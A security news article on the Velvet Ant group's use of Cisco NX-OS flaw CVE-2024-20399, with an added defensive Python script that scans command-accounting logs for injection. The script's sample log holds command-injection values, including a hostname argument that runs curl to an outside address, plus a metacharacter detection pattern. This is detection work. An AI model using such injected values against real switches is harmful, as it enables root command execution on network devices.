TLDR:
- A cyber espionage group named Velvet Ant is exploiting a zero-day flaw in Cisco NX-OS Software to deliver malware.
- The vulnerability allows authenticated, local attackers to execute arbitrary commands as root on affected devices.
A China-linked cyber espionage group known as Velvet Ant has been leveraging a zero-day vulnerability in Cisco NX-OS Software to deploy malware. Tracked as CVE-2024-20399, the vulnerability lets an authenticated, local attacker run arbitrary commands as root on the underlying operating system of affected devices. Velvet Ant used the flaw, which carries a CVSS score of 6.0, to execute previously unknown custom malware that gave it remote access to compromised Cisco Nexus switches.
The issue stems from insufficient validation of arguments passed to specific configuration CLI commands: an attacker can embed crafted input in a command argument and have it executed on the underlying OS without triggering system syslog messages. The score is only medium because exploitation requires valid administrator credentials and access to the affected configuration commands; the practical risk is that an attacker who already holds those credentials gains a root-level foothold that the device does not log. Cisco's advisory lists the MDS 9000 Series Multilayer Switches and the Nexus 3000, 5500 Platform, 5600 Platform, 6000, 7000 and 9000 Series Switches (in standalone NX-OS mode) as affected.
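Because the injected commands are described as not producing syslog messages, the most useful record a defender still has is the CLI command itself, as captured by command accounting, and the things to look for are administrator-level configuration commands whose arguments carry shell metacharacters, issued from unexpected sources. The script below is an added illustration of that check; it is not Cisco's tooling, it is not derived from any published exploit details for CVE-2024-20399, and the record format, the sample log lines and the management subnet are all constructed assumptions for the example.

```python
"""
Heuristic review of NX-OS command-accounting records for configuration
commands whose arguments contain shell metacharacters.

Added example: not Cisco code and not based on published exploit details.
The record layout (timestamp:type=...:id=<src>@<tty>:user=<u>:cmd=<c> (STATUS))
is constructed to resemble accounting-log output and may differ from your
platform; adjust RECORD_RE to match real records before use.
"""
import re
from ipaddress import ip_address, ip_network

# Assumed management network for this example; replace with your own.
MGMT_NETS = [ip_network("10.1.1.0/24")]

# Generic command-injection indicators in an argument: command substitution,
# pipes, background/chaining operators and stray statement separators.
METACHAR_RE = re.compile(r"\$\(|`|\||&|;")

RECORD_RE = re.compile(
    r"^(?P<ts>.+?):type=(?P<type>\w+):id=(?P<src>[^@]+)@(?P<tty>[^:]+)"
    r":user=(?P<user>[^:]+):cmd=(?P<cmd>.*?)\s*\((?P<status>\w+)\)\s*$"
)

# Constructed sample records (not real device output).
SAMPLE_LOG = """\
Mon Jul  1 09:12:01 2024:type=update:id=10.1.1.20@pts/0:user=admin:cmd=configure terminal ; interface Ethernet1/1 ; description uplink-to-core (SUCCESS)
Mon Jul  1 09:13:44 2024:type=update:id=10.1.1.20@pts/0:user=admin:cmd=configure terminal ; hostname nexus-lab ; exit (SUCCESS)
Mon Jul  1 09:15:09 2024:type=update:id=198.51.100.7@pts/1:user=netops:cmd=configure terminal ; interface Ethernet1/2 ; description x$(id) (SUCCESS)
Mon Jul  1 09:15:31 2024:type=update:id=198.51.100.7@pts/1:user=netops:cmd=show version (SUCCESS)
Mon Jul  1 09:16:02 2024:type=update:id=198.51.100.7@pts/1:user=netops:cmd=configure terminal ; hostname `curl 203.0.113.9`  (SUCCESS)
"""


def parse_record(line):
    """Parse one accounting record into a dict, or return None if it does not match."""
    m = RECORD_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # In this constructed format the config-mode path is joined by " ; ".
    rec["segments"] = [s.strip() for s in rec["cmd"].split(" ; ")]
    return rec


def suspicious_segments(rec):
    """Return (segment, reason) pairs for configuration-mode command segments
    whose arguments contain shell metacharacters. Only records that enter
    configuration mode are examined, matching the affected command class."""
    findings = []
    if rec["segments"][0] != "configure terminal":
        return findings
    for seg in rec["segments"][1:]:
        parts = seg.split(None, 1)
        if len(parts) < 2:
            continue  # keyword only, nothing to inject into
        keyword, args = parts
        m = METACHAR_RE.search(args)
        if m:
            findings.append(
                (seg, f"shell metacharacter {m.group(0)!r} in argument to {keyword!r}")
            )
    return findings


def off_network(rec):
    """True when the session source address is outside the assumed management nets."""
    return not any(ip_address(rec["src"]) in net for net in MGMT_NETS)


def scan(log_text):
    """Scan accounting records and return a list of alert dicts."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        for seg, reason in suspicious_segments(rec):
            alerts.append(
                {
                    "user": rec["user"],
                    "src": rec["src"],
                    "segment": seg,
                    "reason": reason,
                    "off_mgmt_net": off_network(rec),
                }
            )
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a)
```

The metacharacter list is deliberately narrow to keep noise down; free-text fields such as interface descriptions can legitimately contain characters like `>` or `/`, so widen it only after checking what your own configurations actually use. The `off_mgmt_net` flag is there because the advisory's precondition is administrator credentials: an admin session from an unexpected source is the context that turns a curious argument into an incident.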
Velvet Ant, first documented by Sygnia in connection with a cyber attack in East Asia, has targeted organizations for years by establishing persistence on legacy network appliances, which are rarely monitored and therefore make malicious activity hard to spot. This incident coincides with threat actors exploiting a critical vulnerability in D-Link routers to gather sensitive information.